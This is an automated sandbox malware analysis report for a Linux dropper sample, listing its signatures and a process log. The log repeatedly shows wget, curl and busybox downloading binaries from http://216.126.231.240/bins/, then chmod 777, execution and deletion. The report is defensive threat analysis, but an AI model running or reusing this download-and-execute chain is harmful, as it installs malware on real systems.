Malware Analysis Report

2025-04-03 19:13

Sample ID 241120-eyzbjavrgq
Target f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN
SHA256 f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6a
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6a

Threat Level: Shows suspicious behavior

The file f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-20 04:21

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-20 04:21

Reported

2024-11-20 04:23

Platform

debian9-mipsbe-20240418-en

Max time kernel

120s

Max time network

123s

Command Line

[/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu N/A
N/A /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr N/A
N/A /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY N/A
N/A /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY N/A
N/A /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 N/A
N/A /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 N/A
N/A /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 N/A
N/A /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 N/A
N/A /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p N/A
N/A /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP N/A
N/A /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI N/A
N/A /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 N/A
N/A /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B N/A
N/A /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp N/A
N/A /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 N/A
N/A /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 N/A
N/A /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 N/A
N/A /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 N/A
N/A /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p N/A
N/A /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP N/A
N/A /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI N/A
N/A /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 N/A
N/A /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B N/A
N/A /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp N/A
N/A /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu N/A
N/A /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr N/A
N/A /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /usr/bin/curl N/A
File opened for modification /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /usr/bin/curl N/A
File opened for modification /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /usr/bin/curl N/A
File opened for modification /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /usr/bin/curl N/A
File opened for modification /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /usr/bin/curl N/A
File opened for modification /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /usr/bin/curl N/A
File opened for modification /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /usr/bin/curl N/A
File opened for modification /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /usr/bin/curl N/A
File opened for modification /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /usr/bin/curl N/A
File opened for modification /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /usr/bin/curl N/A
File opened for modification /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /usr/bin/curl N/A
File opened for modification /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /usr/bin/curl N/A
File opened for modification /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /usr/bin/curl N/A
File opened for modification /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /usr/bin/curl N/A
File opened for modification /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /usr/bin/curl N/A
File opened for modification /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /usr/bin/curl N/A
File opened for modification /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /usr/bin/curl N/A
File opened for modification /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /usr/bin/curl N/A
File opened for modification /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /usr/bin/curl N/A
File opened for modification /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /usr/bin/curl N/A
File opened for modification /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /usr/bin/curl N/A
File opened for modification /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /usr/bin/curl N/A
File opened for modification /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /usr/bin/curl N/A
File opened for modification /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /usr/bin/curl N/A
File opened for modification /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /usr/bin/curl N/A
File opened for modification /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /usr/bin/curl N/A
File opened for modification /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /usr/bin/curl N/A

Processes

/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN

[/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/chmod

[chmod 777 rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu

[./rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/rm

[rm rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/wget

[wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/chmod

[chmod 777 qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr

[./qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/rm

[rm qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/wget

[wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/chmod

[chmod 777 jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY

[./jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/rm

[rm jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/wget

[wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/chmod

[chmod 777 iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY

[./iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/rm

[rm iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/usr/bin/wget

[wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/chmod

[chmod 777 cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4

[./cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/rm

[rm cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/wget

[wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/chmod

[chmod 777 IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4

[./IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/rm

[rm IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/wget

[wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/chmod

[chmod 777 Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0

[./Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/rm

[rm Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/wget

[wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/chmod

[chmod 777 Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2

[./Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/rm

[rm Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/wget

[wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/chmod

[chmod 777 ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p

[./ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/rm

[rm ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/wget

[wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/chmod

[chmod 777 FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP

[./FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/rm

[rm FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/wget

[wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/chmod

[chmod 777 DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI

[./DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/rm

[rm DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/wget

[wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/chmod

[chmod 777 BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2

[./BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/rm

[rm BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/wget

[wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/chmod

[chmod 777 s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B

[./s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/rm

[rm s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/wget

[wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/chmod

[chmod 777 f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp

[./f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/rm

[rm f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/wget

[wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/chmod

[chmod 777 cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4

[./cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/rm

[rm cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/wget

[wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/chmod

[chmod 777 IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4

[./IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/rm

[rm IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/wget

[wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/chmod

[chmod 777 Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0

[./Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/rm

[rm Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/wget

[wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/chmod

[chmod 777 Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2

[./Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/rm

[rm Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/wget

[wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/chmod

[chmod 777 ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p

[./ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/rm

[rm ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/wget

[wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/chmod

[chmod 777 FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP

[./FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/rm

[rm FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/wget

[wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/chmod

[chmod 777 DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI

[./DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/rm

[rm DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/wget

[wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/chmod

[chmod 777 BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2

[./BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/rm

[rm BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/wget

[wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/chmod

[chmod 777 s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B

[./s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/rm

[rm s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/wget

[wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/chmod

[chmod 777 f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp

[./f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/rm

[rm f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/wget

[wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/busybox

